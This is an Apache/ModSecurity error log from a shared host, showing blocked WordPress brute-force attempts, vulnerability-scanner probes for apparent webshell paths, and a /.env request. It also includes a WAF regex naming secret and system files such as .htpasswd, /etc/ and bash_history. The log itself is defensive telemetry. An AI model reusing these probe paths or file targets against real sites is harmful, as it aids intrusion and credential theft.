[Tue May 26 15:41:33.750537 2026] [security2:error] [pid 733610:tid 733657] [remote 74.7.241.58:57946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVx1cLL_4PasUNKBsfYeQAAQi4"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/wpforms-lite/src/Emails
[Tue May 26 15:41:34.170395 2026] [security2:error] [pid 733610:tid 733772] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx1cLL_4PasUNKBsfYeAAAACA"]
[Tue May 26 15:41:34.850806 2026] [security2:error] [pid 733610:tid 733673] [remote 74.7.241.58:57946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVx1sLL_4PasUNKBsfYjgAAPT4"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/wpforms-lite/src/Lite/Emails
[Tue May 26 15:41:36.104069 2026] [security2:error] [pid 733610:tid 733866] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx18LL_4PasUNKBsfYrAAAAH4"]
[Tue May 26 15:41:36.445532 2026] [security2:error] [pid 733610:tid 733667] [remote 51.91.98.45:33356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVx2MLL_4PasUNKBsfYvAAAGzg"]
[Tue May 26 15:41:37.599118 2026] [security2:error] [pid 733610:tid 733822] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx2cLL_4PasUNKBsfY0wAAAFI"]
[Tue May 26 15:41:38.089428 2026] [security2:error] [pid 733610:tid 733680] [remote 74.7.241.58:57946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVx2sLL_4PasUNKBsfY6gAAfkU"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/wpforms-lite/src/Logger
[Tue May 26 15:41:40.988157 2026] [security2:error] [pid 733610:tid 733826] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx3MLL_4PasUNKBsfZLwAAAFY"]
[Tue May 26 15:41:41.734697 2026] [security2:error] [pid 733610:tid 733845] [client 103.153.130.62:59190] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVx3cLL_4PasUNKBsfZSAAAAGk"]
[Tue May 26 15:41:41.734857 2026] [security2:error] [pid 733610:tid 733845] [client 103.153.130.62:59190] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVx3cLL_4PasUNKBsfZSAAAAGk"]
[Tue May 26 15:41:42.401096 2026] [security2:error] [pid 733610:tid 733817] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx3cLL_4PasUNKBsfZUQAAAE0"]
[Tue May 26 15:41:43.722868 2026] [security2:error] [pid 733610:tid 733764] [client 45.92.1.232:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVx38LL_4PasUNKBsfZfgAAABg"], referer: www.google.com
[Tue May 26 15:41:44.267914 2026] [security2:error] [pid 733610:tid 733693] [remote 45.92.1.232:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVx4MLL_4PasUNKBsfZjQAAAFI"], referer: www.google.com
[Tue May 26 15:41:44.570879 2026] [security2:error] [pid 733610:tid 733807] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx4MLL_4PasUNKBsfZiAAAAEM"]
[Tue May 26 15:41:44.689918 2026] [security2:error] [pid 733610:tid 733771] [client 45.92.1.232:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-plain.php"] [unique_id "ahVx4MLL_4PasUNKBsfZmgAAAB8"], referer: www.google.com
[Tue May 26 15:41:45.016820 2026] [security2:error] [pid 733610:tid 733815] [client 45.92.1.232:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/lgkybhdh.php"] [unique_id "ahVx4cLL_4PasUNKBsfZnwAAAEs"], referer: www.google.com
[Tue May 26 15:41:45.187532 2026] [security2:error] [pid 733610:tid 733702] [remote 45.92.1.232:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-plain.php"] [unique_id "ahVx4cLL_4PasUNKBsfZowAAdls"], referer: www.google.com
[Tue May 26 15:41:45.249958 2026] [security2:error] [pid 733610:tid 733707] [remote 45.92.1.232:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVx4cLL_4PasUNKBsfZpAAACGA"]
[Tue May 26 15:41:45.407305 2026] [security2:error] [pid 733610:tid 733706] [remote 45.92.1.232:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/hnzpykcj.php"] [unique_id "ahVx4cLL_4PasUNKBsfZrwAAX18"], referer: www.google.com
[Tue May 26 15:41:45.418683 2026] [security2:error] [pid 733610:tid 733709] [remote 45.92.1.232:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVx4cLL_4PasUNKBsfZsQAASWI"]
[Tue May 26 15:41:45.588993 2026] [core:error] [pid 733610:tid 733804] [client 161.35.87.20:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:41:45.589014 2026] [core:error] [pid 733610:tid 733804] [client 161.35.87.20:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:41:45.604605 2026] [security2:error] [pid 733610:tid 733711] [remote 45.92.1.232:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVx4cLL_4PasUNKBsfZuAAAWmQ"]
[Tue May 26 15:41:45.768191 2026] [security2:error] [pid 733610:tid 733714] [remote 45.92.1.232:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVx4cLL_4PasUNKBsfZvAAAYGc"]
[Tue May 26 15:41:46.697952 2026] [security2:error] [pid 733610:tid 733757] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx4sLL_4PasUNKBsfZ2gAAABE"]
[Tue May 26 15:41:46.713652 2026] [security2:error] [pid 733610:tid 733743] [client 45.92.1.232:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "digitalgerminate.com"] [uri "/index.php"] [unique_id "ahVx4cLL_4PasUNKBsfZpQAAA1o"], referer: www.google.com
[Tue May 26 15:41:47.211207 2026] [security2:error] [pid 733610:tid 733715] [remote 74.7.241.58:38292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVx48LL_4PasUNKBsfZ_wAAd2g"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/wpforms-lite/src/Emails
[Tue May 26 15:41:47.660997 2026] [security2:error] [pid 733610:tid 733760] [client 45.92.1.232:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "digitalgerminate.com"] [uri "/index.php"] [unique_id "ahVx48LL_4PasUNKBsfaEAAAFG0"], referer: www.google.com
[Tue May 26 15:41:48.702501 2026] [security2:error] [pid 733610:tid 733766] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx5MLL_4PasUNKBsfaKQAAABo"]
[Tue May 26 15:41:49.149443 2026] [core:error] [pid 733610:tid 733767] [client 161.35.87.20:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://webmail.rakeshdewan.com/
[Tue May 26 15:41:49.149468 2026] [core:error] [pid 733610:tid 733767] [client 161.35.87.20:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://webmail.rakeshdewan.com/
[Tue May 26 15:41:49.746302 2026] [security2:error] [pid 733610:tid 733777] [client 127.0.0.1:25652] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "127.0.0.1"] [uri "/cgi-sys/autodiscover.cgi"] [unique_id "ahVx5cLL_4PasUNKBsfaUgAAACU"]
[Tue May 26 15:41:49.746305 2026] [security2:error] [pid 733610:tid 733743] [client 127.0.0.1:25642] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "autodiscover.mosykay.com"] [uri "/cgi-sys/autodiscover.cgi"] [unique_id "ahVx5cLL_4PasUNKBsfaUQAAAAM"]
[Tue May 26 15:41:49.746396 2026] [security2:error] [pid 733610:tid 733844] [client 74.7.228.36:52482] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "autodiscover.mosykay.com"] [uri "/robots.txt"] [unique_id "ahVx5cLL_4PasUNKBsfaUAAAaGs"]
[Tue May 26 15:41:49.962090 2026] [security2:error] [pid 733610:tid 733791] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVx5cLL_4PasUNKBsfaVQAAADM"], referer: https://www.anujtradingco.com/
[Tue May 26 15:41:50.735221 2026] [security2:error] [pid 733610:tid 733770] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVx5sLL_4PasUNKBsfaeAAAAB4"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1443956&moderation-hash=9164ad00ee6584c7e227ef699a9953b1
[Tue May 26 15:41:50.922421 2026] [security2:error] [pid 733610:tid 733819] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx5sLL_4PasUNKBsfabwAAAE8"]
[Tue May 26 15:41:51.883119 2026] [security2:error] [pid 733610:tid 733863] [client 103.153.130.62:59456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVx58LL_4PasUNKBsfapQAAAHs"]
[Tue May 26 15:41:51.883257 2026] [security2:error] [pid 733610:tid 733863] [client 103.153.130.62:59456] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVx58LL_4PasUNKBsfapQAAAHs"]
[Tue May 26 15:41:53.027345 2026] [security2:error] [pid 733610:tid 733819] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx6MLL_4PasUNKBsfatwAAAE8"]
[Tue May 26 15:41:53.357139 2026] [security2:error] [pid 733610:tid 733777] [client 14.186.66.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx6MLL_4PasUNKBsfawgAAACU"]
[Tue May 26 15:41:54.044753 2026] [security2:error] [pid 733610:tid 733855] [client 223.123.35.44:35750] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVx6cLL_4PasUNKBsfa4AAAAHM"]
[Tue May 26 15:41:54.044901 2026] [security2:error] [pid 733610:tid 733855] [client 223.123.35.44:35750] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVx6cLL_4PasUNKBsfa4AAAAHM"]
[Tue May 26 15:41:55.018700 2026] [security2:error] [pid 733610:tid 733834] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx6sLL_4PasUNKBsfa-gAAAF4"]
[Tue May 26 15:41:55.371312 2026] [security2:error] [pid 733610:tid 733796] [client 172.226.44.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVx68LL_4PasUNKBsfbCAAAADg"]
[Tue May 26 15:41:56.522703 2026] [security2:error] [pid 733610:tid 733802] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx7MLL_4PasUNKBsfbIgAAAD4"]
[Tue May 26 15:41:57.451720 2026] [security2:error] [pid 733610:tid 733630] [remote 163.223.13.54:48790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.13.223.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVx7cLL_4PasUNKBsfbQAAAPRM"]
[Tue May 26 15:41:58.160473 2026] [security2:error] [pid 733610:tid 733821] [client 157.55.39.201:52798] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahVx7MLL_4PasUNKBsfbNgAAAFE"]
[Tue May 26 15:41:59.237244 2026] [security2:error] [pid 733610:tid 733840] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx7sLL_4PasUNKBsfbdQAAAGQ"]
[Tue May 26 15:41:59.701114 2026] [security2:error] [pid 733610:tid 733843] [client 62.60.130.233:58776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "amdsi.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahVx78LL_4PasUNKBsfbigAAAGc"], referer: https://www.facebook.com/
[Tue May 26 15:41:59.869599 2026] [proxy:error] [pid 733610:tid 733847] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:41:59.869691 2026] [proxy_http:error] [pid 733610:tid 733847] [client 195.96.139.217:43401] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:41:59.870274 2026] [proxy:error] [pid 733610:tid 733847] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:41:59.870309 2026] [proxy_http:error] [pid 733610:tid 733847] [client 195.96.139.217:43401] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:42:00.028342 2026] [security2:error] [pid 733610:tid 733815] [client 62.60.130.233:51911] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "amdsi.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahVx8MLL_4PasUNKBsfblQAAAEs"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 15:42:00.441450 2026] [security2:error] [pid 733610:tid 733749] [client 85.208.96.196:16702] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-24-28/day/2023-12-15/"] [unique_id "ahVx8MLL_4PasUNKBsfbmgAAAAk"]
[Tue May 26 15:42:00.441582 2026] [security2:error] [pid 733610:tid 733749] [client 85.208.96.196:16702] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-24-28/day/2023-12-15/"] [unique_id "ahVx8MLL_4PasUNKBsfbmgAAAAk"]
[Tue May 26 15:42:01.422210 2026] [security2:error] [pid 733610:tid 733796] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx8MLL_4PasUNKBsfbqwAAADg"]
[Tue May 26 15:42:02.325874 2026] [security2:error] [pid 733610:tid 733764] [client 103.153.130.62:59721] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVx8sLL_4PasUNKBsfb6wAAABg"]
[Tue May 26 15:42:02.325993 2026] [security2:error] [pid 733610:tid 733764] [client 103.153.130.62:59721] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVx8sLL_4PasUNKBsfb6wAAABg"]
[Tue May 26 15:42:02.759585 2026] [security2:error] [pid 733610:tid 733744] [client 176.65.139.231:21568] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.krishnawoodworks.svijaykumar.in"] [uri "/.env"] [unique_id "ahVx8sLL_4PasUNKBsfb_AAAAAQ"]
[Tue May 26 15:42:02.814990 2026] [security2:error] [pid 733610:tid 733746] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx8sLL_4PasUNKBsfb7gAAAAY"]
[Tue May 26 15:42:05.574495 2026] [security2:error] [pid 733610:tid 733863] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx9cLL_4PasUNKBsfcSgAAAHs"]
[Tue May 26 15:42:07.072941 2026] [security2:error] [pid 733610:tid 733747] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx9sLL_4PasUNKBsfccgAAAAc"]
[Tue May 26 15:42:07.138139 2026] [security2:error] [pid 733610:tid 733775] [client 157.55.39.63:28482] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahVx9sLL_4PasUNKBsfcfAAAACM"]
